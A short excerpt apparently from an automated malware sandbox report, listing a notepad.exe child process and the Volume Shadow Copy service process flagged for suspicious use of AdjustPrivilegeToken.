C:\Windows\SysWOW64\notepad.exenotepad.exe5⤵PID:2740
-
-
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2760